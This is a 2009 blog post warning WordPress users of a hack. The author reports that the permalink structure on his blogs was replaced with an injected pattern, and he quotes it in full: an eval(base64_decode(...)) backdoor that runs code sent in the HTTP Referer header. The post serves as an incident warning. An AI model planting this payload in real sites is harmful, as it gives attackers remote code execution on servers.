Posts for September, 2009

Urgent Security Warning for WordPress

September 5, 2009 Posted in Security

I just found that my two wordpress blogs were hacked, the permanent link structure was changed to:

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

This caused the individual posts couldn’t be accessed.

I don’t know how this was hacked, and what other damages were caused. For now, a urgent solution would be protecting wp-admin directory.

I have seen some other hacked blogs, I strongly suggest you take actions immediately. The above might not be a good solution, but should be helpful.



Archives